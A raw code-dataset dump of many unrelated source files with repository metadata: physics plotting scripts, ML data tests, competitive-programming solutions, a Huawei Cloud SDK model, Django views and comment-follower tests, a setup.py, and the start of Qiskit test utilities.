c3e30f6134e4652db4fcb9a756938a84de9592d2 | 3a85089c2498ff04d1b9bce17a4b8bf6cf2380c9 | /TrackPropagation/SteppingHelixPropagator/python/__init__.py | e9c699776f8f1dbd5ebfdd70d185bf5b183ab392 | [] | no_license | sextonkennedy/cmssw-ib | c2e85b5ffa1269505597025e55db4ffee896a6c3 | e04f4c26752e0775bd3cffd3a936b288ee7b0268 | HEAD | 2016-09-01T20:09:33.163593 | 2013-04-26T12:05:17 | 2013-04-29T16:40:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 232 | py | #Automatically created by SCRAM
import os
__path__.append(os.path.dirname(os.path.abspath(__file__).rsplit('/TrackPropagation/SteppingHelixPropagator/',1)[0])+'/cfipython/slc6_amd64_gcc480/TrackPropagation/SteppingHelixPropagator')
| [
"giulio.eulisse@cern.ch"
] | giulio.eulisse@cern.ch |
ff0a7531475d07eb5161d4785ee3ed33b3de3b33 | 165e706d485e90f4e4f63cfb9f2c35acda14cfc0 | /uq_benchmark_2019/imagenet/data_lib_test.py | b3ae4f7ae9236b62494d913b373efd1af733d1ab | [
"Apache-2.0"
] | permissive | Tarkiyah/googleResearch | 65581f3bbbe2ffe248c9e613c0ea7eac336d5372 | dea327aa9e7ef7f7bca5a6c225dbdca1077a06e9 | refs/heads/master | 2022-12-07T12:04:44.153221 | 2019-11-21T16:03:48 | 2019-11-21T16:18:28 | 223,229,888 | 11 | 2 | Apache-2.0 | 2022-11-21T21:39:10 | 2019-11-21T17:38:31 | Jupyter Notebook | UTF-8 | Python | false | false | 4,751 | py | # coding=utf-8
# Copyright 2019 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python2, python3
"""Tests for imagenet.data_lib."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import flags
from absl.testing import absltest
from absl.testing import parameterized
import tensorflow.compat.v2 as tf
from uq_benchmark_2019 import image_data_utils
from uq_benchmark_2019.imagenet import data_lib
flags.DEFINE_bool('fake_data', True, 'Bypass tests that rely on real data and '
'use dummy random data for the remaining tests.')
tf.enable_v2_behavior()
BATCH_SIZE = 8
BATCHED_IMAGES_SHAPE = (BATCH_SIZE,) + data_lib.IMAGENET_SHAPE
class DataLibTest(parameterized.TestCase, tf.test.TestCase):
@parameterized.parameters(['train', 'test', 'valid'])
def test_fake_data(self, split):
# config is ignored for fake data
config = image_data_utils.DataConfig(split)
dataset = data_lib.build_dataset(config, BATCH_SIZE, fake_data=True)
image = next(iter(dataset))[0].numpy()
self.assertEqual(image.shape, BATCHED_IMAGES_SHAPE)
self.assertAllInRange(image, 0., 1.)
self.assertTrue((image > 1./255).any())
@parameterized.parameters(['train', 'test', 'valid'])
def test_uncorrupted_data(self, split):
config = image_data_utils.DataConfig(split)
if not flags.FLAGS.fake_data:
dataset = data_lib.build_dataset(config, BATCH_SIZE)
image = next(iter(dataset))[0].numpy()
self.assertEqual(image.shape, BATCHED_IMAGES_SHAPE)
self.assertAllInRange(image, 0., 1.)
self.assertTrue((image > 1./255).any())
@parameterized.parameters(['train', 'test', 'valid'])
def test_roll_pixels(self, split):
config = image_data_utils.DataConfig(split, roll_pixels=5)
if not flags.FLAGS.fake_data:
dataset = data_lib.build_dataset(config, BATCH_SIZE)
image = next(iter(dataset))[0].numpy()
self.assertEqual(image.shape, BATCHED_IMAGES_SHAPE)
self.assertAllInRange(image, 0., 1.)
self.assertTrue((image > 1./255).any())
@parameterized.parameters(['train', 'test', 'valid'])
def test_static_imagenet_c(self, split):
if not flags.FLAGS.fake_data:
config = image_data_utils.DataConfig(
split, corruption_static=True, corruption_level=3,
corruption_type='pixelate')
if split in ['train', 'valid']:
with self.assertRaises(ValueError):
data_lib.build_dataset(config, BATCH_SIZE)
else:
dataset = data_lib.build_dataset(config, BATCH_SIZE)
image = next(iter(dataset))[0].numpy()
self.assertEqual(image.shape, BATCHED_IMAGES_SHAPE)
self.assertAllInRange(image, 0., 1.)
self.assertTrue((image > 1./255).any())
@parameterized.parameters(['train', 'test', 'valid'])
def test_array_imagenet_c(self, split):
if not flags.FLAGS.fake_data:
config = image_data_utils.DataConfig(
split, corruption_level=4, corruption_type='glass_blur')
dataset = data_lib.build_dataset(config, BATCH_SIZE)
image = next(iter(dataset))[0].numpy()
self.assertEqual(image.shape, BATCHED_IMAGES_SHAPE)
self.assertAllInRange(image, 0., 1.)
self.assertTrue((image > 1./255).any())
@parameterized.parameters(['train', 'test', 'valid'])
def test_value_imagenet_c(self, split):
if not flags.FLAGS.fake_data:
config = image_data_utils.DataConfig(
split, corruption_value=.25, corruption_type='brightness')
dataset = data_lib.build_dataset(config, BATCH_SIZE)
image = next(iter(dataset))[0].numpy()
self.assertEqual(image.shape, BATCHED_IMAGES_SHAPE)
self.assertAllInRange(image, 0., 1.)
self.assertTrue((image > 1./255).any())
def test_alt_dataset(self):
if not flags.FLAGS.fake_data:
config = image_data_utils.DataConfig('test', alt_dataset_name='celeb_a')
dataset = data_lib.build_dataset(config, BATCH_SIZE)
image = next(iter(dataset))[0].numpy()
self.assertEqual(image.shape, BATCHED_IMAGES_SHAPE)
self.assertAllInRange(image, 0., 1.)
self.assertTrue((image > 1./255).any())
if __name__ == '__main__':
absltest.main()
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
3817408a598bef35193652dc85f27df0d7823622 | 8023bdc11776a09b0fff0e9b581bbd42b8013afa | /h2tau/PlotEM.py | 7e972f1232900d42d001e07c09b25d5c20d09127 | [] | no_license | uwcms/UWHiggs | 0785d431b12df07e872a00b36279227781a6c1de | 53c1bd2671dea2553f8bbc5dcdf56a823ccf36f6 | refs/heads/master | 2021-01-16T19:32:45.480056 | 2014-02-06T02:11:54 | 2014-02-06T02:11:54 | 8,310,494 | 0 | 2 | null | 2014-10-10T13:03:07 | 2013-02-20T10:02:08 | C++ | UTF-8 | Python | false | false | 1,396 | py | '''
Make inclusive e-mu (Z + ttbar) control plots
'''
import os
import glob
from FinalStateAnalysis.PlotTools.Plotter import Plotter
jobid = os.environ['jobid']
output_dir = os.path.join('results', jobid, 'plots', 'em')
samples = [
'Zjets_M50',
'WZ*',
'WW*',
'ZZ*',
'TT*',
'WplusJets*',
"data_MuEG*",
]
files = []
lumifiles = []
for x in samples:
files.extend(glob.glob('results/%s/AnalyzeEM/%s.root' % (jobid, x)))
lumifiles.extend(glob.glob('inputs/%s/%s.lumicalc.sum' % (jobid, x)))
plotter = Plotter(files, lumifiles, output_dir)
# Override ordering
plotter.mc_samples = [
'TTplusJets_madgraph',
'WplusJets_madgraph',
'Zjets_M50',
'WZJetsTo3LNu*',
'WW*',
'ZZJetsTo4L*',
]
sqrts = 7 if '7TeV' in jobid else 8
plotter.plot_mc_vs_data('em', 'emMass', rebin=10, leftside=False,
xaxis='m_{e#mu} (GeV)')
plotter.add_cms_blurb(sqrts)
plotter.save('mass')
plotter.plot_mc_vs_data('em', 'mPt')
plotter.save('mPt')
plotter.plot_mc_vs_data('em', 'ePt')
plotter.save('ePt')
plotter.plot_mc_vs_data('em', 'mAbsEta')
plotter.save('mAbsEta')
plotter.plot_mc_vs_data('em', 'eAbsEta')
plotter.save('eAbsEta')
plotter.plot_mc_vs_data('em', 'nvtx')
plotter.save('nvtx')
plotter.plot_mc_vs_data('em', 'bjetCSVVeto')
plotter.save('bjetCSVVeto')
plotter.plot_mc_vs_data('em', 'bjetVeto')
plotter.save('bjetVeto')
| [
"ekfriis@gmail.com"
] | ekfriis@gmail.com |
152113e43cceee7807ab807267ca54fb2a1d1c19 | 5922398212b6e113f416a54d37c2765d7d119bb0 | /python/Search a 2D Matrix.py | 28456dbb8f7a1a1330809a51885131a419f64dcf | [] | no_license | CrazyCoder4Carrot/lintcode | e777f73e1fdfe3b8abc9dbfc07d26602bf614151 | 33dcd7f0e2d9bee58840a3370837cb2db82de1eb | refs/heads/master | 2021-01-09T20:38:59.813198 | 2017-01-16T22:34:26 | 2017-01-16T22:34:26 | 60,287,619 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 352 | py | class Solution:
"""
@param matrix, a list of lists of integers
@param target, an integer
@return a boolean, indicate whether matrix contains target
"""
def searchMatrix(self, matrix, target):
# write your code here
for row in matrix:
if target in row:
return True
return False | [
"liuzhenbang1988@gmail.com"
] | liuzhenbang1988@gmail.com |
2bb6b170f6c1fa3e3e754886a338b80c7b74302c | 59a688e68421794af64bfe69a74f64b2c80cd79d | /math_riddles/floor_problem_challenge.py | ddbc10db108624c04c65eb5008db0f6129fe587a | [] | no_license | hearues-zueke-github/python_programs | f23469b306e057512aadecad0ca0a02705667a15 | d24f04ca143aa93f172210a4b9dfdd9bf1b79a15 | refs/heads/master | 2023-07-26T00:36:56.512635 | 2023-07-17T12:35:16 | 2023-07-17T12:35:16 | 117,093,746 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,089 | py | #! /usr/bin/python3
from fractions import Fraction as frac
from math import floor as fl
if __name__=='__main__':
# solve x*floor(x*floor(x*floor(x))) = n, where n = 2020 e.g.
def f(x):
return x*fl(x*fl(x*fl(x)))
n = 2020
numer = 1
denom = 1
# a = frac(1, 1)
is_increment_numerator = True
while True:
a = frac(numer, denom)
y = f(a)
fl_y = fl(y)
print("numer: {}, denom: {}, float(y): {}".format(numer, denom, float(y)))
if (y.numerator % y.denominator == 0) and (fl_y == n):
break
if is_increment_numerator:
numer += 1
a_new = frac(numer, denom)
# fl_a_new = fl(f(a_new))
if f(a_new)>n:
# if fl_a_new>n:
is_increment_numerator = False
a = a_new
else:
denom += 1
a_new = frac(numer, denom+1)
# fl_a_new = fl(f(a_new))
if f(a_new)<n:
# if fl_a_new<n:
is_increment_numerator = True
a = a_new
| [
"hziko314@gmail.com"
] | hziko314@gmail.com |
5cd36692ca51be88c22fee7de2ef5d3cd9b98621 | 551b75f52d28c0b5c8944d808a361470e2602654 | /huaweicloud-sdk-cce/huaweicloudsdkcce/v3/model/node_nic_spec.py | 964ad72f81427f81c112f83c177d65a55488e0f1 | [
"Apache-2.0"
] | permissive | wuchen-huawei/huaweicloud-sdk-python-v3 | 9d6597ce8ab666a9a297b3d936aeb85c55cf5877 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | refs/heads/master | 2023-05-08T21:32:31.920300 | 2021-05-26T08:54:18 | 2021-05-26T08:54:18 | 370,898,764 | 0 | 0 | NOASSERTION | 2021-05-26T03:50:07 | 2021-05-26T03:50:07 | null | UTF-8 | Python | false | false | 3,422 | py | # coding: utf-8
import pprint
import re
import six
class NodeNicSpec:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'primary_nic': 'NicSpec',
'ext_nics': 'list[NicSpec]'
}
attribute_map = {
'primary_nic': 'primaryNic',
'ext_nics': 'extNics'
}
def __init__(self, primary_nic=None, ext_nics=None):
"""NodeNicSpec - a model defined in huaweicloud sdk"""
self._primary_nic = None
self._ext_nics = None
self.discriminator = None
if primary_nic is not None:
self.primary_nic = primary_nic
if ext_nics is not None:
self.ext_nics = ext_nics
@property
def primary_nic(self):
"""Gets the primary_nic of this NodeNicSpec.
:return: The primary_nic of this NodeNicSpec.
:rtype: NicSpec
"""
return self._primary_nic
@primary_nic.setter
def primary_nic(self, primary_nic):
"""Sets the primary_nic of this NodeNicSpec.
:param primary_nic: The primary_nic of this NodeNicSpec.
:type: NicSpec
"""
self._primary_nic = primary_nic
@property
def ext_nics(self):
"""Gets the ext_nics of this NodeNicSpec.
扩展网卡
:return: The ext_nics of this NodeNicSpec.
:rtype: list[NicSpec]
"""
return self._ext_nics
@ext_nics.setter
def ext_nics(self, ext_nics):
"""Sets the ext_nics of this NodeNicSpec.
扩展网卡
:param ext_nics: The ext_nics of this NodeNicSpec.
:type: list[NicSpec]
"""
self._ext_nics = ext_nics
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, NodeNicSpec):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
be980be27bb8f62cb951489a5a2b039bb1c37cb9 | c8cee25ecb60ca3e6ce5e24c37db57f82f9858f6 | /ConversionPDFaExcelconPythonPandas/pdfaexcelconpandas.py | f2ae448d09dcaa10e19f8e115b76df442765633a | [] | no_license | mecomontes/Python | a0b4a0b69ae33ad3623e908731710563392d1615 | daba4247cca90c43a979e3e3f292cd7b8951b3d0 | refs/heads/master | 2023-05-30T05:24:41.999196 | 2020-03-23T02:30:09 | 2020-03-23T02:30:09 | 249,317,310 | 1 | 0 | null | 2023-05-22T22:42:36 | 2020-03-23T02:29:38 | Python | UTF-8 | Python | false | false | 339 | py | from tabula import read_pdf
df = read_pdf('../Pdfs/Libro1.pdf',
guess=False,
pandas_options={'skiprows':[0,1],'header':None}
)
df.head()
headers = ['Mes','Dia','Año','PptSalpo','TempMax','TempMin','Ppt','Wind','Hum','Solar']
df.columns = headers
df.head()
df.to_excel('../Xls/Libro1.xlsx')
| [
"1574@holbertonschool.com"
] | 1574@holbertonschool.com |
155ca9d2c3c3e780023de74a3f730658e9eb5a3e | eb36f5ee5b97aae79e7da87602fd4da293a52892 | /tests/op/test_op_setitem.py | af18cd175b6825ed13b183153485f125ea4ab78b | [
"MIT"
] | permissive | turiya/toy-auto-diff | e3f3adc803d0f2c34d9211a62bc646fa491372e2 | bd54cd4d34b482498927449608d47039368dcd8a | refs/heads/master | 2020-06-20T03:25:14.975249 | 2019-03-02T04:58:30 | 2019-03-02T04:58:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 704 | py | import numpy as np
import auto_diff as ad
from .util import NumGradCheck
class TestOpSetItem(NumGradCheck):
def test_forward(self):
x_val = np.random.random((3, 4))
x = ad.variable(x_val)
y = ad.setitem(x, (1, 2), ad.constant(5.0))
actual = y.forward()[1, 2]
expect = 5.0
self.assertEqual(x.shape, y.shape)
self.assertTrue(np.allclose(expect, actual), (expect, actual))
def test_backward(self):
with self.assertRaises(NotImplementedError):
x_val = np.random.random((3, 4))
x = ad.variable(x_val)
y = ad.setitem(x, (1, 2), ad.constant(5.0))
self.numeric_gradient_check(y, {}, [x])
| [
"CyberZHG@gmail.com"
] | CyberZHG@gmail.com |
fd521e1e8e0199069605ae7e221b0c9872a0793f | de56ee2369d36c93ad802f0359f3274b9a3f0a25 | /photos/views.py | 24f001752b2e3f0c656bd3f2ee705b695289f932 | [] | no_license | Anubhav722/asynchronous-celery-tasks | bdfd485b6c6b2777a4712ad64ebabf347e717654 | a21f055e8e524db662d21f60dac2f8daab075f63 | refs/heads/master | 2021-01-23T00:45:41.631402 | 2017-05-31T10:47:44 | 2017-05-31T10:47:44 | 92,840,568 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 438 | py | from django.shortcuts import render
from django.views.generic.list import ListView
from photos.models import Photo
from feedback.forms import FeedbackForm
# Create your views here.
class PhotoView(ListView):
model = Photo
template_name = 'photos/photo_list.html'
paginate_by = 24
def get_context_data(self, **kwargs):
context = super(PhotoView, self).get_context_data(**kwargs)
context['form'] = FeedbackForm()
return context | [
"anubhavs286@gmail.com"
] | anubhavs286@gmail.com |
5864bdacd428ec82508f2d42b00accffcb92af2e | 8410bb5a2e8849bb3a554b95ddc713d88f3440c4 | /aws-dev/awsdev9/venv/Lib/site-packages/dns/rdtypes/ANY/DS(1).py | 7d457b2281e3fa4a816885299c994457c23f6ba4 | [
"MIT"
] | permissive | PacktPublishing/-AWS-Certified-Developer---Associate-Certification | ae99b6c1efb30e8fab5b76e3d8c821823a4cd852 | b9838b4e038b42ad1813a296379cbbc40cab6286 | refs/heads/master | 2022-11-03T04:37:49.014335 | 2022-10-31T05:42:19 | 2022-10-31T05:42:19 | 219,964,717 | 13 | 11 | MIT | 2021-06-02T00:57:45 | 2019-11-06T09:54:09 | Python | UTF-8 | Python | false | false | 950 | py | # Copyright (C) Dnspython Contributors, see LICENSE for text of ISC license
# Copyright (C) 2003-2007, 2009-2011 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import dns.rdtypes.dsbase
class DS(dns.rdtypes.dsbase.DSBase):
"""DS record"""
| [
"sonalis@packtpub.com"
] | sonalis@packtpub.com |
beb326dc1932346c4a7e3a63941053a44da0e48a | d2eb7bd335175edd844a3e6c1c633ee0dc2dbb25 | /contests_atcoder/arc110/arc110_a.py | 72fdc5c78f226f000d840020f629b98b4bbf4129 | [
"BSD-2-Clause"
] | permissive | stdiorion/competitive-programming | 5020a12b85f1e691ceb0cacd021606a9dc58b72c | e7cf8ef923ccefad39a1727ca94c610d650fcb76 | refs/heads/main | 2023-03-27T01:13:42.691586 | 2021-03-08T08:05:53 | 2021-03-08T08:05:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 641 | py | from itertools import accumulate,chain,combinations,groupby,permutations,product
from collections import deque,Counter
from bisect import bisect_left,bisect_right
from math import gcd,sqrt,sin,cos,tan,degrees,radians
from fractions import Fraction
from decimal import Decimal
from functools import reduce
import sys
input = lambda: sys.stdin.readline().rstrip()
#from sys import setrecursionlimit
#setrecursionlimit(10**7)
MOD=10**9+7
INF=float('inf')
def lcm_base(x, y):
return (x * y) // gcd(x, y)
def lcm(*numbers):
return reduce(lcm_base, numbers, 1)
n = int(input())
print(---+-+--+---+----+-1 + lcm(*list(range(2, n + 1)))) | [
"itkn1900@gmail.com"
] | itkn1900@gmail.com |
b03d70f00d9f929eb2e0d6a9404207541522dfe7 | 52cb25dca22292fce4d3907cc370098d7a57fcc2 | /BAEKJOON/수학1/1748_수 이어 쓰기1.py | 167d4e44ab35c67945bc83a25c6beb23aeb37edd | [] | no_license | shjang1013/Algorithm | c4fc4c52cbbd3b7ecf063c716f600d1dbfc40d1a | 33f2caa6339afc6fc53ea872691145effbce0309 | refs/heads/master | 2022-09-16T12:02:53.146884 | 2022-08-31T16:29:04 | 2022-08-31T16:29:04 | 227,843,135 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 178 | py | # 새로운 수의 자릿수를 출력하기
N = input()
n = len(N)
count = 0
for i in range(n-1):
count += 9*(10**i)*(i+1)
count += (int(N)-10**(n-1)+1)*n
print(count)
| [
"shjang113@gmail.com"
] | shjang113@gmail.com |
c73ec9c62a678fa9a4f062d57defffbd993e56da | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/21/usersdata/75/8322/submittedfiles/exercicio24.py | ff41fdd82bbba07417472c07bcf3f1e9ba01e933 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 206 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
i=1
a= int(input('Digite o valor do primeiro número:'))
b= int(input('Digite o valor do segundo número:'))
while i<=(a and b):
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
e2a45d6a3e24edb3074e7e521b9f78b91a415f56 | 6e6f97f416c06aada38c3a9db23eed7517bfaa6d | /comment/tests/test_models/test_followers.py | 0a11fadb19eb1f3dec4e17ab1490bebd3bb2f26c | [
"MIT"
] | permissive | ZendaInnocent/sogea | 1735ad047539c09a5c81e196a7a1963022452098 | 54cf257856cae451ad87e2396b8e44a34c0c6daf | refs/heads/main | 2023-08-23T07:18:45.741826 | 2021-10-28T13:19:06 | 2021-10-28T13:19:06 | 365,683,816 | 0 | 0 | MIT | 2021-05-09T06:29:57 | 2021-05-09T06:29:57 | null | UTF-8 | Python | false | false | 7,294 | py | from unittest.mock import patch
from django.contrib.contenttypes.models import ContentType
from comment.conf import settings
from comment.models import Follower
from comment.tests.base import BaseCommentTest
class FollowerModelTest(BaseCommentTest):
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.comment_test_follow = cls.create_comment(cls.content_object_1)
cls.email = 't@t.com'
cls.follower = Follower.objects.create(
email=cls.email,
username='test',
content_object=cls.comment_test_follow
)
def test_can_create_entry(self):
self.assertIsNotNone(self.follower)
def test_string_value(self):
self.assertEqual(str(self.follower), f'{str(self.comment_test_follow)} followed by {self.email}')
self.assertEqual(repr(self.follower), f'{str(self.comment_test_follow)} followed by {self.email}')
class FollowerManagerTest(BaseCommentTest):
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.manager = Follower.objects
cls.follower_email = 'f1@t.com'
cls.unfollower_email = 'uf@t.com'
cls.comment_test_follow = cls.create_comment(cls.content_object_1)
cls.comment_without_email = cls.create_comment(cls.content_object_1, user=cls.user_without_email)
cls.follower = cls.manager.create(
email=cls.follower_email,
username='test',
content_object=cls.comment_test_follow
)
def test_is_following(self):
self.assertTrue(self.manager.is_following(self.follower_email, self.comment_test_follow))
self.assertFalse(self.manager.is_following(self.unfollower_email, self.comment_test_follow))
def test_follow_return_none_on_missing_email(self):
self.assertIsNone(self.manager.follow('', 'username', self.comment_test_follow))
def test_follow_return_none_if_email_is_already_follow(self):
self.assertTrue(self.manager.is_following(self.follower_email, self.comment_test_follow))
self.assertIsNone(self.manager.follow(self.follower_email, 'username', self.comment_test_follow))
def test_follow_create_follower_instance(self):
initial_count = self.manager.count()
follower = self.manager.follow(self.unfollower_email, 'username', self.comment_test_follow)
self.assertIsInstance(follower, self.manager.model)
self.assertEqual(self.manager.count(), initial_count + 1)
def test_unfollow_delete_follower_instance(self):
initial_count = self.manager.count()
self.assertTrue(self.manager.is_following(self.follower_email, self.comment_test_follow))
self.manager.unfollow(self.follower_email, self.comment_test_follow)
self.assertEqual(self.manager.count(), initial_count - 1)
def test_toggle_follow_return_false_on_missing_email(self):
email = None
result = self.manager.toggle_follow(email=email, username='test', model_object=self.comment_test_follow)
self.assertFalse(result)
def test_toggle_follow_for_follower(self):
"""set the follower to unfollower and return false"""
self.assertTrue(self.manager.is_following(self.follower_email, self.comment_test_follow))
result = self.manager.toggle_follow(
email=self.follower_email,
username='test_user',
model_object=self.comment_test_follow
)
self.assertFalse(result)
self.assertFalse(self.manager.is_following(self.follower_email, self.comment_test_follow))
def test_toggle_follow_for_unfollower(self):
"""set the unfollower to follower and return true"""
self.assertFalse(self.manager.is_following(self.unfollower_email, self.comment_test_follow))
result = self.manager.toggle_follow(
email=self.unfollower_email,
username='test_user',
model_object=self.comment_test_follow
)
self.assertTrue(result)
self.assertTrue(self.manager.is_following(self.unfollower_email, self.comment_test_follow))
def test_follow_parent_thread_for_comment_no_email(self):
self.assertFalse(self.comment_without_email.email)
self.assertFalse(self.manager.is_following(self.comment_without_email.email, self.comment_without_email))
self.manager.follow_parent_thread_for_comment(self.comment_without_email)
self.assertFalse(self.manager.is_following(self.comment_without_email.email, self.comment_without_email))
@patch.object(settings, 'COMMENT_ALLOW_SUBSCRIPTION', False)
def test_follow_parent_thread_for_comment_child_comment(self):
child_comment = self.create_comment(self.content_object_1, user=self.user_2, parent=self.comment_without_email)
# the parent (thread) will not be followed on creating child comment
self.assertFalse(self.manager.is_following(child_comment.email, child_comment.content_object))
# the parent comment (thread) is not followed yet
self.assertFalse(self.manager.is_following(child_comment.email, self.comment_without_email))
# child comment cannot be followed
self.assertFalse(self.manager.is_following(child_comment.email, child_comment))
self.manager.follow_parent_thread_for_comment(child_comment)
# the parent (thread) will not be followed on creating child comment
self.assertFalse(self.manager.is_following(child_comment.email, child_comment.content_object))
# the parent is now followed
self.assertTrue(self.manager.is_following(child_comment.email, self.comment_without_email))
# child comment cannot be followed
self.assertFalse(self.manager.is_following(child_comment.email, child_comment))
@patch.object(settings, 'COMMENT_ALLOW_SUBSCRIPTION', False)
def test_follow_parent_thread_for_comment_parent_comment(self):
parent_comment = self.create_comment(self.content_object_1, user=self.user_2)
# the parent (thread) is not followed yet
self.assertFalse(self.manager.is_following(parent_comment.email, parent_comment.content_object))
# parent comment is not followed yet
self.assertFalse(self.manager.is_following(parent_comment.email, parent_comment))
self.manager.follow_parent_thread_for_comment(parent_comment)
# the parent (thread) is now followed
self.assertTrue(self.manager.is_following(parent_comment.email, parent_comment.content_object))
# parent comment is now followed
self.assertTrue(self.manager.is_following(parent_comment.email, parent_comment))
def test_get_all_followers_for_model_object(self):
followers = self.manager.filter_for_model_object(self.comment_test_follow)
content_type = ContentType.objects.get_for_model(self.comment_test_follow)
self.assertNotEqual(followers.count(), 0)
self.assertEqual(
list(followers),
list(self.manager.filter(content_type=content_type, object_id=self.comment_test_follow.id))
)
def test_get_get_emails_for_model_object(self):
emails = self.manager.get_emails_for_model_object(self.comment_test_follow)
self.assertIn(self.comment_test_follow.email, emails)
| [
"medsonnaftal@gmail.com"
] | medsonnaftal@gmail.com |
0914435a0dd3e06ec45e07ea57a79f9c4688419e | 471a036309c05b59243033f2480e27e19268ec55 | /src/london/setup.py | 574ffec30ba669a92a1fc8544c5c6533d47e5545 | [
"BSD-2-Clause"
] | permissive | avelino/votacao_paredao_bbb | 1bbf33b9ec00f033db5b1d558190135315d50b03 | 875ac157b207fee80be6841f9b17c41b7069e15d | refs/heads/master | 2021-01-20T12:17:48.362512 | 2012-07-13T05:41:44 | 2012-07-13T05:41:44 | 4,928,781 | 0 | 0 | null | 2020-07-27T11:05:32 | 2012-07-06T17:51:03 | Python | UTF-8 | Python | false | false | 1,682 | py | import london
import os
import sys
# Downloads setuptools if not find it before try to import
try:
import ez_setup
ez_setup.use_setuptools()
except ImportError:
pass
from setuptools import setup
def fullsplit(path, result=None):
"""
Split a pathname into components (the opposite of os.path.join) in a
platform-neutral way. Copied from Django.
"""
if result is None:
result = []
head, tail = os.path.split(path)
if head == '':
return [tail] + result
if head == path:
return result
return fullsplit(head, [tail] + result)
packages = []
data_files = []
london_dir = 'london'
for dirpath, dirnames, filenames in os.walk(london_dir):
for i, dirname in enumerate(dirnames):
if dirname.startswith('.'): del dirnames[i]
if '__init__.py' in filenames:
packages.append('.'.join(fullsplit(dirpath)))
elif filenames:
data_files.append([dirpath, [os.path.join(dirpath, f) for f in filenames]])
if sys.version_info[0] >= 3:
install_requires = ['distribute', 'Jinja2', 'nose', 'PyDispatcher', 'BeautifulSoup4','python-money',
'tornado','pymongo==2.1.1']
else:
install_requires = ['distribute', 'Jinja2', 'nose', 'simplejson', 'PyDispatcher',
'BeautifulSoup==3.2.0','python-money','tornado','pymongo==2.1.1']
setup(
name='London',
version=london.__version__,
#url='',
author=london.__author__,
license=london.__license__,
packages=packages,
data_files=data_files,
scripts=['london/bin/london-admin.py','london/bin/london-create-project.py'],
install_requires=install_requires,
#setup_requires=[],
)
| [
"thiagoavelinoster@gmail.com"
] | thiagoavelinoster@gmail.com |
4c9cbf1a4a291e0732c209b2377e48be7480b156 | ec1059f4ccea10deb2cb8fd7f9458700a5e6ca4c | /venv/Lib/site-packages/qiskit/test/utils.py | 05433cc98a74738a7ca38e52e181892c3a231072 | [
"Apache-2.0",
"MIT"
] | permissive | shivam675/Quantum-CERN | b60c697a3a7ad836b3653ee9ce3875a6eafae3ba | ce02d9198d9f5a1aa828482fea9b213a725b56bb | refs/heads/main | 2023-01-06T20:07:15.994294 | 2020-11-13T10:01:38 | 2020-11-13T10:01:38 | 330,435,191 | 1 | 0 | MIT | 2021-01-17T16:29:26 | 2021-01-17T16:29:25 | null | UTF-8 | Python | false | false | 3,962 | py | # This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2018.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Utils for using with Qiskit unit tests."""
import logging
import os
import unittest
from enum import Enum
from itertools import product
